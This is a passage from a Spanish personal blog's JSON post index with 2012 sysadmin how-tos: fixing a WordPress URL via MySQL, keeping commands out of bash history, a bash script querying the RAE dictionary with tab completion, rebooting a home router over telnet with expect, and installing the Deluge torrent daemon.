través de PhpMyAdmin o, si tenemos acceso al terminal, con un cliente de MySQL. Por ejemplo, si queremos asignar la dirección de WordPress a http://www.example.com:\n$ mysql -uuser -p wordpress mysql\u0026gt; update wp_options set option_value = \u0026#34;http://www.example.com\u0026#34; where option_name = \u0026#34;siteurl\u0026#34;; Si queremos modificar el valor de la dirección del sitio:\nmysql\u0026gt; update wp_options set option_value = \u0026#34;http://www.example.com\u0026#34; where option_name = \u0026#34;home\u0026#34;; Para modificar la URL de los archivos subidos:\nmysql\u0026gt; update wp_options set option_value = \u0026#34;http://www.example.com/wp-uploads\u0026#34; where option_name = \u0026#34;upload_url_path\u0026#34;; Si queremos hacer un cambio masivo, como cambiar una dirección que aparezca en el contenido de los artículos o de los comentarios:\nmysql\u0026gt; update wp_posts set post_content = replace(post_content, \u0026#39;example.com\u0026#39;, \u0026#39;new-domain.com\u0026#39;), guid = replace(guid, \u0026#39;example.com\u0026#39;, \u0026#39;new-domain.com\u0026#39;); mysql\u0026gt; update wp_comments set comment_author_url = replace(comment_author_url, \u0026#39;example.com\u0026#39;, \u0026#39;new-domain.com\u0026#39;); En el caso de los plugins, dependerá de cada caso. Por ejemplo:\nmysql\u0026gt; update wp_randomtext set text = replace(text, \u0026#39;example.com\u0026#39;, \u0026#39;new-domain.com\u0026#39;); Dos sentencias útiles, una nos muestra las tablas que tenemos y la otra la información de una tabla concreta:\nmysql\u0026gt; show tables; mysql\u0026gt; desc wp_posts; Por último, si hemos actualizado la dirección de WordPress y estamos usando alguna técnica anti-hotlinking, deberíamos revisar el archivo .htaccess, por si debiéramos actualizarlo.\n","permalink":"http://karpoke.ignaciocano.com/2012/04/05/recuperar-la-direccion-de-wordpress/","summary":"\u003cp\u003eEn el panel de administración de WordPress, en Ajustes \u0026gt; Generales,\npodemos cambiar la dirección del blog o la dirección donde está\ninstalado Wordpress.\u003c/p\u003e\n\u003cp\u003eTenemos que tener cuidado si cambiamos la dirección de WordPress, ya que\npodemos dejar el sitio, y en especial el panel de control, inaccesible.\nO puede que lo que nos interese sea actualizar el dominio antiguo por el\nnuevo.\u003c/p\u003e\n\u003cp\u003eEn ambas situaciones, si sólo se debe modificar el dominio, sin que se\ndeba cambiar ninguna ruta relativa de acceso al blog, podemos lograr\nacceso al panel de administración incluyendo el nuevo dominio al archivo\n\u003ccode\u003e/etc/hosts\u003c/code\u003e, y desde ahí modificar cualquier variable que necesitemos.\u003c/p\u003e","title":"Recuperar la dirección de WordPress"},{"content":"Por diferentes motivos, nos puede interesar que lo que escribamos en el terminal no quede registrado en el historial, por ejemplo, si necesitamos escribir una contraseña. Esto se puede conseguir de diferentes maneras. El historial cuenta con una copia en memoria, accesible mediante el comando history, que se vuelca en el fichero ~/.bash_history al terminar la sesión.\nLas variables involucradas en el historial son:\nHISTCONTROL, contiene una lista de valores separados por coma que indican bajo qué condiciones se deben añadir entradas al historial. Estos valores pueden ser `ignorespace`, `ignoredups`, `ignoreboth` o `erasedups`. HISTFILE, contiene el nombre del fichero donde se guardará el historial. Por defecto `~/.bash_history`. HISTFILESIZE, contiene el número máximo de entradas que se guardarán en el fichero. Por defecto, 500. HISTIGNORE, contiene una lista separada por dos puntos : de los comandos que deben ser ignorados. Podemos utilizar `*` para crear patrones que deban coincidir. HISTSIZE, contiene el número de entradas en memoria que debe contener el historial. Por defecto, 500. HISTTIMEFORMAT, puede contener el formato utilizado para guardar la fecha y hora asociada a cada entrada en el historial. Espacio al inicio Una opción es especificar que se ignoren las entradas que comiencen con un espacio. Para activar esta opción de forma permanente, la variable HISTCONTROL debe contener el valor ignorespace o ignoreboth (ignoreboth incluye ignorespace e ignoredups, ésta última es para ignorar duplicados) en nuestro archivo de configuración ~/.bashrc.\nSi sólo queremos que sea efectivo para la sesión actual podemos modificar el valor de la variable en el terminal.\nHISTCONTROL=ignoreboth Tamaño del historial Otra opción es poner modificar el valor de la variable HISTSIZE, que contiene el tamaño del historial en memoria. Por ejemplo, le asignamos un valor de 0 a la variable:\nHISTSIZE=0 Asignarle un valor vacío parece que provoca que sólo se guarde el último comando introducido y eliminar la variable con unset tampoco funciona, al menos en bash, ya que entonces toma el valor por defecto de 500.\nEl fichero del historial Podemos modificar el valor de la variables HISTFILE o HISTFILESIZE para evitar que el historial de la sesión se guarde en disco al terminal. Hay que tener en cuenta que lo que escribamos seguirá disponible en memoria y será accesible con el comando history.\n","permalink":"http://karpoke.ignaciocano.com/2012/03/16/evitar-el-registro-de-comandos-en-el-historial/","summary":"\u003cp\u003ePor diferentes motivos, nos puede interesar que lo que escribamos en el\nterminal no quede registrado en el historial, por ejemplo, si\nnecesitamos escribir una contraseña. Esto se puede conseguir de\ndiferentes maneras. El historial cuenta con una copia en memoria,\naccesible mediante el comando \u003ccode\u003ehistory\u003c/code\u003e, que se vuelca en el fichero\n\u003ccode\u003e~/.bash_history\u003c/code\u003e al terminar la sesión.\u003c/p\u003e\n\u003cp\u003eLas variables involucradas en el historial son:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eHISTCONTROL\u003c/code\u003e, contiene una lista de valores separados por coma que\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eindican bajo qué condiciones se deben añadir entradas al historial.\nEstos valores pueden ser `ignorespace`, `ignoredups`, `ignoreboth` o\n`erasedups`.\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eHISTFILE\u003c/code\u003e, contiene el nombre del fichero donde se guardará el\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ehistorial. Por defecto `~/.bash_history`.\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eHISTFILESIZE\u003c/code\u003e, contiene el número máximo de entradas que se\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eguardarán en el fichero. Por defecto, 500.\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eHISTIGNORE\u003c/code\u003e, contiene una lista separada por dos puntos \u003ccode\u003e:\u003c/code\u003e de los\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ecomandos que deben ser ignorados. Podemos utilizar `*` para crear\npatrones que deban coincidir.\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eHISTSIZE\u003c/code\u003e, contiene el número de entradas en memoria que debe\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003econtener el historial. Por defecto, 500.\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eHISTTIMEFORMAT\u003c/code\u003e, puede contener el formato utilizado para guardar\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ela fecha y hora asociada a cada entrada en el historial.\n\u003c/code\u003e\u003c/pre\u003e\u003ch2 id=\"espacio-al-inicio\"\u003eEspacio al inicio\u003c/h2\u003e\n\u003cp\u003eUna opción es especificar que se ignoren las entradas que comiencen con\nun espacio. Para activar esta opción de forma permanente, la variable\n\u003ccode\u003eHISTCONTROL\u003c/code\u003e debe contener el valor \u003ccode\u003eignorespace\u003c/code\u003e o \u003ccode\u003eignoreboth\u003c/code\u003e\n(\u003ccode\u003eignoreboth\u003c/code\u003e incluye \u003ccode\u003eignorespace\u003c/code\u003e e \u003ccode\u003eignoredups\u003c/code\u003e, ésta última es para\nignorar duplicados) en nuestro archivo de configuración \u003ccode\u003e~/.bashrc\u003c/code\u003e.\u003c/p\u003e","title":"Evitar el registro de comandos en el historial"},{"content":"Al realizar consultas al buscón de la RAE desde el terminal, me iba muy lento. Ésta es una página que todavía usa marcos (wtf!), por lo que si queremos acceder directamente a la página con el resultado de la búsqueda deberemos utilizar una de las siguientes URLs:\n~~Para el diccionario de la RAE: `http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón`~~ ~~Para el diccionario panhispánico de dudas: `http://buscon.rae.es/dpdI/SrvltGUIBusDPD?origen=RAE\u0026amp;lema=cederrón`~~ Actualización La RAE ha cambiado la URL de búsqueda, pasando a ser:\nPara el buscón: buscón: \u0026lt;http://www.rae.es/drae/srv/search?origen=RAE\u0026amp;type=3\u0026amp;val=buscador\u0026gt; Para el panhispánico de dudas: \u0026lt;http://www.rae.es/dpd/srv/search?origen=RAE\u0026amp;key=terminal\u0026gt; Además, también se ha cambiado la codificación de la URL de UTF-8 a ISO-8859-1, por lo que se deberá tener en cuenta para aquellas palabras que contengan caracteres donde ambas codificaciones son distintas, como las vocales con tilde o diéresis o la letra eñe.\nEn el artículo, dejaré las referencias a las URLs antiguas para que quede un registro de cómo ha ido evolucionando el script.\nPara descargar y visualizar el contenido de una página desde el terminal lo podemos hacer de diferentes maneras, por ejemplo:\n$ curl -s \u0026ldquo;http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón\u0026rdquo; $ w3m -dump \u0026ldquo;http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón\u0026rdquo; $ lynx -dump \u0026ldquo;http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón\u0026rdquo; $ links -dump \u0026ldquo;http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón\u0026rdquo; $ elinks -dump \u0026ldquo;http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón\u0026rdquo;\nPero con todas ellas me iba muy lento, incluso si sólo descargamos la cabecera:\n$ time curl -I -s \u0026ldquo;http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón\u0026rdquo;\nHTTP/1.1 200 OK Connection: close Date: Mon, 27 Feb 2012 23:20:26 GMT Server: Microsoft-IIS/6.0 Server: WebSphere Application Server/5.1 Content-Type: text/html Content-Language: es-ES real 0m38.410s user 0m0.008s sys 0m0.004s No parece que sea un problema de User Agent, porque tanto si utilizamos lynx como si utilizamos curl podemos modificarlo (y usar, por ejemplo, el de Firefox o el de Internet Explorer) y la página sigue tardando en responder.\n$ curl -s \u0026ndash;user-agent \u0026ldquo;Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2\u0026rdquo; \u0026ldquo;http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón\u0026rdquo;\nEl problema parece estar en el tiempo que tarda en resolverse el dominio. Usando nslookup podemos ver que tras el dominio buscon.rae.es hay un balanceador:\n$ nslookup buscon.rae.es\nServer: 208.67.222.222 Address: 208.67.222.222#53 Non-authoritative answer: buscon.rae.es canonical name = buscon.balanceo.rae.es. Name: buscon.balanceo.rae.es Address: 85.62.96.169 Podría ser que la primera vez que se hace una consulta en Firefox también tarde, y que las siguientes consultas sean instantáneas porque se guarde la IP, y sin embargo con curl estemos resolviendo la IP cada vez, pero tampoco podría asegurarlo dado no he hecho muchas más pruebas y lo siguiente me ha funcionado.\nSi utilizamos la IP en lugar del dominio,obtenemos una repuesta inmediata. Probad lo siguiente, si acaso con la IP que os devuelva nslookup:\n$ curl -s \u0026ldquo;http://85.62.96.169/draeI/SrvltGUIBusUsual?LEMA=cederrón\u0026amp;origen=RAE\u0026amp;TIPO_BUS=3\u0026rdquo;\nHe probado con otros comandos en lugar de nslookup, como host o dig, pero con nslookup parece que se tarda menos en obtener la respuesta.\nEl problema es que esta IP va cambiando, pero podemos utilizar nslookup en el script, cuyo resultado es instantáneo, y filtrar el resultado de curl tal como se ha comentado en este foro de Ubuntu:\n#!/bin/bash - set -o nounset # Treat unset variables as an error WORD=\u0026#34;$1\u0026#34; if [ -z \u0026#34;$WORD\u0026#34; ]; then echo \u0026#34;Usage: ${0##*/} word\u0026#34; exit 1 fi CURL=/usr/bin/curl HTML2TEXT=/usr/bin/html2text NSLOOKUP=/usr/bin/nslookup for p in $CURL $HTML2TEXT $NSLOOKUP; do if [ ! -x $p ]; then echo \u0026#34;[+] $p not found. You must install it first.\u0026#34; exit 1 fi done DOMAIN=buscon.rae.es IP=$($NSLOOKUP $DOMAIN | tail -2 | head -1 | awk \u0026#39;{print $2}\u0026#39;) URL=\u0026#34;http://$IP/draeI/SrvltGUIBusUsual?LEMA=$WORD\u0026amp;origen=RAE\u0026amp;TIPO_BUS=3\u0026#34; RESET_TEXT=\u0026#39;\\e[0m\u0026#39; # reset HIGHLIGHT_TEXT=\u0026#39;\\e[0;31m\u0026#39; # red echo -e \u0026#34;[+] ${HIGHLIGHT_TEXT}${WORD}${RESET_TEXT} $URL\\n\u0026#34; $CURL -s \u0026ldquo;$URL\u0026rdquo; | $HTML2TEXT | head -n-2 | sed -e \u0026rsquo;s/[Ver_artículo_enmendado]/*\\ /g'\nAquí se puede descargar el script rae.sh.\nPor último, un ejemplo de uso, suponiendo que el script tiene permisos de ejecución y se encuentra en el directorio actual:\n$ ./rae.sh cederrón\n[+] cederrón http://85.62.96.169/draeI/SrvltGUIBusUsual?LEMA=cederrón\u0026amp;origen=RAE\u0026amp;TIPO_BUS=3 cederrón. (De CD-ROM, y este sigla del ingl. CompactDiscRead-OnlyMemory). 1. m.Inform. CD-ROM. Actualizado el 12 de marzo de 2012 He realizado unas pequeñas modificaciones en el script:\nya no acepta únicamente una palabra, sino una lista de ellas. Por ejemplo: `./rae.sh cederrón dvd disquete` se puede utilizar el argumento -p para que busque también en el panhispánico de dudas. he cambiado el uso de curl por lynx, así no hay necesidad de parsear el resultado. he añadido autocompletado para las palabras. No están todas las que son ni son todas las que están, pero es bastante útil en la mayoría de las ocasiones. Actualizado el 30 de abril de 2012 Ha habido cambios en la página de la RAE, de tal manera que usar la IP directamente en la URL ya no sirve; la página devuelve un error 400 Bad Request (Invalid Hostname). Una manera de resolver este inconveniente es añadir la IP y el dominio en el archivo /etc/hosts, para que podamos utilizar el dominio en la URL y no sea necesario resolver su IP:\n$ grep buscon.rae.es /etc/hosts\n193.145.222.107 buscon.rae.es El script vuelve a funcionar como la seda, por ahora.\nActualizado el 3 de julio de 2012 Ha vuelto a haber cambios en la página de la RAE. El dominio ha cambiado, pasando a ser lema.rae.es, y las rutas relativas para el Diccionario de la RAE y el Panhispánico de dudas también han cambiado. Ahora son algo así:\n# DRAE: http://lema.rae.es/drae/srv/search?type=3\u0026amp;val_aux=\u0026amp;origen=RAE\u0026amp;val=cederrón # DPD: http://lema.rae.es/dpd/srv/search?origen=RAE\u0026amp;key=cederrón La IP sigue siendo la misma por lo que basta cambiar el dominio en el fichero /etc/hosts:\n$ grep lema.rae.es /etc/hosts\n193.145.222.107 lema.rae.es Aunque lo bueno es que vuelve a funcionar el truco de poner la IP en lugar del dominio en la URL, y la respuesta es incluso más rápida :)\nActualizado el 7 de septiembre de 2012 Ha habido un nuevo cambio en la página del buscón de la RAE. Las nuevas URLs pasan a ser:\nPara el buscón: http://www.rae.es/drae Para el panhispánico de dudas: http://www.rae.es/dpd Además, la URL se debe codificar en formato Western (ISO-8859-1). Se ven afectadas aquellas palabras que tengan vocales con tilde, la u con diéresis o la letra eñe. Una manera de cambiar la codificación de la palabra es utilizar las funciones utf8_decode y urlencode de PHP, por lo que deberemos tener instalado el paquete php5-cli:\n$ php -r \u0026rsquo;echo urlencode(utf8_decode(\u0026ldquo;áéíóúüñ\u0026rdquo;));'\n%E1%E9%ED%F3%FA%FC%F1 Añadir autocompletado Una de las características más útiles en la línea de comandos es el autocompletado. Empezamos a escribir un comando, un alias, un nombre de archivo o directorio, etc, y pulsamos el tabulador. Si sólo hay una opción posible cuyo prefijo coincida con lo que hemos escrito, ésta se completa mágicamente. Si hay más de una opción posible, no pasará nada, lo que nos indica que podemos pulsar el tabulador una vez más para que entonces nos muestre una lista de las opciones disponibles.\nTeniendo esto en cuenta, podríamos añadir autocompletado a nuestro script para que busque en el diccionario instalado en local. Realmente no es un diccionario, sino una lista de palabras en castellano ordenadas alfabéticamente que no tiene por qué ser completa. Para instalar este listado:\n$ sudo aptitude install wspanish\nEl autocompletado se consigue mediante una función que especifica los resultados a mostrar, en función de diferentes factores. Por ejemplo, si estamos usando el comando ping es útil que autocomplete con los nombres de los hosts del fichero /etc/hosts, o si estamos matando un proceso, que utilice el PID de los procesos que hay en ejecución, si es con kill, o en los nombres de estos procesos, si es jhb pkill. Luego asociamos esta función con nuestro script. Crearemos un fichero que incluya dicha función, y luego la asocie a nuestro script. En Ubuntu, este fichero debe estar en /etc/bash_completion.d/.\nCrearemos esta asociación mediante el comando complete. Este comando nos permite, además, consultar y modificar estas asociaciones. Por ejemplo, para ver la lista de asociaciones actual ejecutamos:\n$ complete -p\nEl fichero es algo así:\n_foo() { local cur prev opts COMPREPLY=() cur=\u0026#34;${COMP_WORDS[COMP_CWORD]}\u0026#34; prev=\u0026#34;${COMP_WORDS[COMP_CWORD-1]}\u0026#34; opts=\u0026#34;--help --verbose --version\u0026#34; if [[ ${cur} == -* ]] ; then COMPREPLY=( $(compgen -W \u0026#34;${opts}\u0026#34; -- ${cur}) ) return 0 fi } complete -F _foo foo _foo es la función que se encarga de crear la lista de opciones disponibles. En este caso, permite seleccionar entre tres opciones posibles, --help, --verbose y --version. Las variables cur y prev contienen el argumento anterior y el actual (o lo que llevamos escrito de él), y se pueden utilizar para crear reglas de asociación más complejas. Por último, el comando compgen selecciona las candidatas de entre el listado de opciones disponibles. En las referencias al final se puede encontrar información más detallada.\nEn el fichero /etc/bash_completion se pueden encontrar algunas de las expansiones más comunes como, por ejemplo, obtener un listado de directorios en el directorio actual, señales, direcciones MAC, interfaces de red, hosts, PIDs, UIDs, GIDs, servicios, módulos, módulos instalados, grupos a los que pertenece un usuario, usuarios autorizados, grupos autorizados, shells, tipos de sistemas de ficheros, etc.\nSin embargo, en nuestro caso hay algo que deberemos tener en cuenta a la hora de crear el listado de opciones, y es que estas opciones son palabras que pueden contener espacios, comillas o barras invertidas, que puede que deban ser escapadas primero para poder ser utilizadas. Utilizaremos el siguiente código el el fichero de autocompletado rae:\n# http://stackoverflow.com/a/1146716 _find_words() { search=$(eval echo \u0026#34;$cur\u0026#34; 2\u0026gt;/dev/null || eval echo \u0026#34;$cur\u0026#39;\u0026#34; 2\u0026gt;/dev/null || eval echo \u0026#34;$cur\\\u0026#34;\u0026#34; 2\u0026gt;/dev/null || \u0026#34;\u0026#34;) grep -- \u0026#34;^$search\u0026#34; /usr/share/dict/spanish | sed -e \u0026#34;{\u0026#34; -e \u0026#39;s#\\\\#\\\\\\\\#g\u0026#39; -e \u0026#34;s#\u0026#39;#\\\\\\\u0026#39;#g\u0026#34; -e \u0026#39;s#\u0026#34;#\\\\\\\u0026#34;#g\u0026#39; -e \u0026#34;}\u0026#34; } _words_complete() { local IFS=$\u0026#39;\\n\u0026#39; COMPREPLY=() local cur=\u0026#34;${COMP_WORDS[COMP_CWORD]}\u0026#34; COMPREPLY=( $( compgen -W \u0026#34;$(_find_words)\u0026#34; -- \u0026#34;$cur\u0026#34; ) ) local escaped_single_qoute=\u0026#34;\u0026#39;\\\u0026#39;\u0026#39;\u0026#34; local i=0 for entry in ${COMPREPLY[*]} do if [[ \u0026#34;${cur:0:1}\u0026#34; == \u0026#34;\u0026#39;\u0026#34; ]] then # started with single quote, escaping only other single quotes # [\u0026#39;]bla\u0026#39;bla\u0026#34;bla\\bla bla --\u0026gt; [\u0026#39;]bla\u0026#39;\\\u0026#39;\u0026#39;bla\u0026#34;bla\\bla bla COMPREPLY[$i]=\u0026#34;${entry//\\\u0026#39;/${escaped_single_qoute}}\u0026#34; elif [[ \u0026#34;${cur:0:1}\u0026#34; == \u0026#34;\\\u0026#34;\u0026#34; ]] then # started with double quote, escaping all double quotes and all backslashes # [\u0026#34;]bla\u0026#39;bla\u0026#34;bla\\bla bla --\u0026gt; [\u0026#34;]bla\u0026#39;bla\\\u0026#34;bla\\\\bla bla entry=\u0026#34;${entry//\\\\/\\\\\\\\}\u0026#34; COMPREPLY[$i]=\u0026#34;${entry//\\\u0026#34;/\\\\\\\u0026#34;}\u0026#34; else # no quotes in front, escaping _everything_ # [ ]bla\u0026#39;bla\u0026#34;bla\\bla bla --\u0026gt; [ ]bla\\\u0026#39;bla\\\u0026#34;bla\\\\bla\\ bla entry=\u0026#34;${entry//\\\\/\\\\\\\\}\u0026#34; entry=\u0026#34;${entry//\\\u0026#39;/\\\u0026#39;}\u0026#34; entry=\u0026#34;${entry//\\\u0026#34;/\\\\\\\u0026#34;}\u0026#34; COMPREPLY[$i]=\u0026#34;${entry// /\\\\ }\u0026#34; fi (( i++ )) done } complete -F _words_complete rae.sh Hay que tener en cuenta que el script rae.sh debe ser accesible desde el path del sistema. Ahora, guardamos este fichero en /etc/bash_completion.d/rae y lo cargamos:\n. /etc/bash_completion.d/rae Ya podemos probarlo:\n$ rae.sh line[TAB][TAB]\nlineal lineamento lineamiento linear linera linero Referencias » DuckDuckGo » User Agent » Foro de Ubuntu-es » Bash manual \u0026gt; Programmable Completion » An introduction to bash completion » Handling spaces and quotes in autocompletion\n","permalink":"http://karpoke.ignaciocano.com/2012/02/28/consultar-el-buscon-de-la-rae-desde-el-terminal/","summary":"\u003cp\u003eAl realizar consultas al \u003ca href=\"http://buscon.rae.es/draeI/\"\u003ebuscón de la RAE\u003c/a\u003e desde el terminal, me iba\nmuy lento. Ésta es una página que todavía usa marcos (wtf!), por lo que\nsi queremos acceder directamente a la página con el resultado de la\nbúsqueda deberemos utilizar una de las siguientes URLs:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e~~Para el \u003ca href=\"http://buscon.rae.es/draeI/\"\u003ediccionario de la RAE\u003c/a\u003e:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e`http://buscon.rae.es/draeI/SrvltGUIBusUsual?origen=RAE\u0026amp;TIPO_BUS=3\u0026amp;LEMA=cederrón`~~\n\u003c/code\u003e\u003c/pre\u003e\u003cul\u003e\n\u003cli\u003e~~Para el \u003ca href=\"http://buscon.rae.es/dpdI/\"\u003ediccionario panhispánico de dudas\u003c/a\u003e:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e`http://buscon.rae.es/dpdI/SrvltGUIBusDPD?origen=RAE\u0026amp;lema=cederrón`~~\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch4 id=\"actualización\"\u003eActualización\u003c/h4\u003e\n\u003cp\u003eLa RAE ha cambiado la URL de búsqueda, pasando a ser:\u003c/p\u003e","title":"Consultar el buscón de la RAE desde el terminal"},{"content":"De vez en cuando, necesitamos reiniciar nuestro router. Por ejemplo, para provocar un cambio de IP, si tenemos IP dinámica. Podemos acceder al panel de administración del router mediante el navegador, normalmente en el puerto 80 u 8080, aunque también es posible hacerlo a través de telnet, en el puerto 22.\nPara hacer más sencillo este trámite, utilizaremos un script que se conecta por telnet al router, introduce el usuario y la contraseña y lo reinicia mediante el comando reboot. Esto dependerá de cada modelo de router en concreto, pero creo que funciona para un gran número. En principio, no es posible apagarlo, sólo reiniciarlo.\nEl siguiente script, router.sh, permite ejecutar un comando en el router utilizando expect:\n#!/usr/bin/expect -f set timeout 20 set username \u0026#34;admin\u0026#34; set password \u0026#34;admin\u0026#34; set ip \u0026#34;192.168.1.1\u0026#34; # Read command as arg to this script set cmd [lindex $argv 0] spawn telnet $ip expect \u0026#34;Login:\u0026#34; send -- \u0026#34;$username\\r\u0026#34; expect \u0026#34;Password:\u0026#34; send -- \u0026#34;$password\\r\u0026#34; expect \u0026#34; \u0026gt; \u0026#34; send -- \u0026#34;$cmd\\r\u0026#34; expect \u0026#34; \u0026gt; \u0026#34; send -- \u0026#34;^D\u0026#34; Para reiniciarlo, ejecutamos:\n$ router.sh reboot Para obtener un listado de comandos disponibles, en este caso en un Comtrend:\n$ router.sh help spawn telnet 192.168.1.1 Trying 192.168.1.1... Connected to 192.168.1.1. Escape character is \u0026#39;^]\u0026#39;. BCM96328 Broadband Router Login: admin Password: \u0026gt; help ? help logout exit quit reboot adsl xdslctl xtm brctl cat loglevel logdest virtualserver ddns df dumpcfg dumpmdm meminfo psp kill dnsproxy syslog echo ifconfig ping ps pwd sntp sysinfo tftp wlctl arp defaultgateway dhcpserver dns lan lanhosts passwd ppp restoredefault route save swversion cfgupdate swupdate exitOnIdle wan build version Mejorando el script Un inconveniente es que los datos de conexión, usuario, contraseña e IP, están escritos directamente en el script. Podemos modificar el script para que nos pida los datos, o pasárselos como parámetros, pero si lo hacemos así, prácticamente no ganamos nada respecto a conectarnos directamente por telnet al router.\nMediante yad (yet another dialog, un fork mejorado de zenity), crearemos una sencilla interfaz gráfica que nos pida los parámetros previamente.\nBásicamente, consiste en mostrar una pantalla con 3 campos y los botones de aceptar y cancelar. La IP del router se obtiene de la salida del comando route. Una vez que se haya reiniciado el router, nos aparecerá una ventana mostrándonos la nueva IP.\naction=$(yad --title \u0026#34;Router Reboot\u0026#34; --image=gnome-shutdown --form --field=Username --field=Password:H --field=Gateway --separator=\u0026#34; \u0026#34; --button=\u0026#34;gtk-ok:0\u0026#34; --button=\u0026#34;gtk-cancel:1\u0026#34; $username $password $gateway) ret=$? Si le damos a aceptar, la variable $action contendrá el valor de las variables $username, $password y $gateway separados por un espacio, y $ret contendrá el valor del botón pulsado, 0 para aceptar y 1 para cancelar.\n$ echo $action admin admin 192.168.1.1 $ echo $ret 0 Enlace al script router-reboot.\nActualizado el 26 de mayo de 2013 Ha caído en mis manos el router Comtred VR-3025u de Jazztel, que permite renovar la IP sin tener que reiniciar el router, por lo que el cambio es mucho más rápido que esperar a que reinicie.\nHe encontrado el siguiente script en un foro de Banda Ancha para llevar a cabo la renovación de la IP:\n#!/bin/sh # vr3025u IFACE=ppp1.1 # vr3025un #IFACE=ppp1 USER=admin PASS=admin IP=192.168.1.1 ( sleep 3 echo $USER sleep 1 echo $PASS sleep 1 echo ppp config $IFACE down sleep 5 echo ppp config $IFACE up sleep 1 echo exit ) | telnet $IP Referencias » Shell script to reboot DSL/ADSL router » yad examples » Script cambio IP Comtrend VR-3025un (para JDownloader)\n","permalink":"http://karpoke.ignaciocano.com/2012/02/09/reiniciar-el-router-desde-bash/","summary":"\u003cp\u003eDe vez en cuando, necesitamos reiniciar nuestro \u003cem\u003erouter\u003c/em\u003e. Por ejemplo,\npara provocar un cambio de IP, si tenemos IP dinámica. Podemos acceder\nal panel de administración del \u003cem\u003erouter\u003c/em\u003e mediante el navegador,\nnormalmente en el puerto 80 u 8080, aunque también es posible hacerlo a\ntravés de telnet, en el puerto 22.\u003c/p\u003e\n\u003cp\u003ePara hacer más sencillo este trámite, utilizaremos un \u003cem\u003escript\u003c/em\u003e que se\nconecta por telnet al \u003cem\u003erouter\u003c/em\u003e, introduce el usuario y la contraseña y\nlo reinicia mediante el comando \u003ccode\u003ereboot\u003c/code\u003e. Esto dependerá de cada modelo\nde \u003cem\u003erouter\u003c/em\u003e en concreto, pero creo que funciona para un gran número. En\nprincipio, no es posible apagarlo, sólo reiniciarlo.\u003c/p\u003e","title":"Reiniciar el router desde el terminal"},{"content":"deluge es un cliente de BitTorrent en el que la interfaz está separada del núcleo, que corre como un servicio, lo que posibilita usarlo de forma remota a través de una interfaz web.\nInstalación Podemos instalar deluge y su interfaz web desde los repositorios:\n$ sudo aptitude install deluged deluge-webui Crearemos el usuario \u0026ldquo;deluge\u0026rdquo; para ejecutar este servicio:\n$ sudo adduser --disabled-password --system --home /var/lib/deluge --gecos \u0026#34;SamRo Deluge server\u0026#34; --group deluge Creamos el script /etc/default/deluge-daemon:\n# Configuration for /etc/init.d/deluge-daemon # The init.d script will only run if this variable non-empty. DELUGED_USER=\u0026#34;deluge\u0026#34; # Should we run at startup? RUN_AT_STARTUP=\u0026#34;YES\u0026#34; Copiamos el script deluge-daemon a /etc/init.d y nos aseguramos de que tenga permisos de ejecución.\nConfiguramos el script para ejecutarse al inicio:\n$ sudo update-rc.d deluge-daemon defaults Lo ejecutamos, para no tener que esperar al próximo reinicio:\n$ sudo invoke-rc.d deluge-daemon start Ya podemos acceder a la interfaz web: http://localhost:8112. La contraseña por defecto es \u0026ldquo;deluge\u0026rdquo;. Nada más iniciar sesión deberíamos cambiarla. También tendremos la opción de usar SSL.\nEl cortafuegos Si hemos instalado deluge en otro equipo de la red y tiene activado un cortafuegos deberemos permitir el acceso para poder acceder a la interfaz web. Por ejemplo, si usamos ufw y queremos que pueda acceder cualquier equipo dentro de la misma red deberíamos añadir la regla:\n$ sudo ufw allow proto tcp from 192.168.1.0/24 to any port 8112 Logging Si queremos que se recojan mensajes de log, deberemos crear los siguientes directorios para el usuario deluge:\n$ sudo mkdir -p /var/log/deluge/daemon $ sudo mkdir -p /var/log/deluge/web $ sudo chmod -R 755 /var/log/deluge $ sudo chown -R deluge /var/log/deluge Modificamos las opciones del script /etc/init.d/deluge-daemon para que contenga las líneas:\nDAEMON1_ARGS=\u0026#34;-d -L warning -l /var/log/deluge/daemon/warning.log\u0026#34; # Consult `man deluged` for more options DAEMON2_ARGS=\u0026#34;-L warning -l 